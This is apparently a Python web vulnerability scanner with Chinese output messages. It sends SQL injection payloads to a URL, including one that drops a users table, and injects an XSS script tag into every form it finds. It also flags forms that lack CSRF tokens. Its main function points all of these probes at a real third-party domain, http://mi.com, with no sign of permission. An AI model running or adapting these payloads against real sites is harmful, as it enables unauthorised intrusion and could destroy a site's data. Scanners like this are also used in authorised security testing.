import requests
import re
from bs4 import BeautifulSoup
def check_sql_injection(url):
common_payloads = ["' OR '1'='1'", "'; DROP TABLE users; --", "1' OR 'a'='a"]
for payload in common_payloads:
test_url = url + "?param=" + payload
response = requests.get(test_url)
if "error" in response.text.lower() or "syntax error" in response.text.lower():
print(f"可能存在 SQL 注入漏洞: {test_url}")
def check_xss(url):
xss_payloads = ["<script>alert('XSS')</script>", "<img src=x οnerrοr=alert('XSS')>"]
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
for form in forms:
action = form.get('action')
method = form.get('method', 'get').lower()
inputs = form.find_all('input')
data = {}
for input_tag in inputs:
name = input_tag.get('name')
if name:
data[name] = xss_payloads[0]
if method == 'post':
response = requests.post(url + action, data=data)
else:
response = requests.get(url + action, params=data)
if xss_payloads[0] in response.text:
print(f"可能存在 XSS 漏洞: {url + action}")
def check_csrf(url):
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
csrf_tokens = []
for form in forms:
csrf_input = form.find('input', attrs={'name': re.compile(r'csrf_token|csrfmiddlewaretoken', re.IGNORECASE)})
if csrf_input:
csrf_tokens.append(csrf_input.get('value'))
if not csrf_tokens:
print(f"可能存在 CSRF 漏洞: {url}")
def main():
url = "http://mi.com"
check_sql_injection(url)
check_xss(url)
check_csrf(url)
if __name__ == "__main__":
main()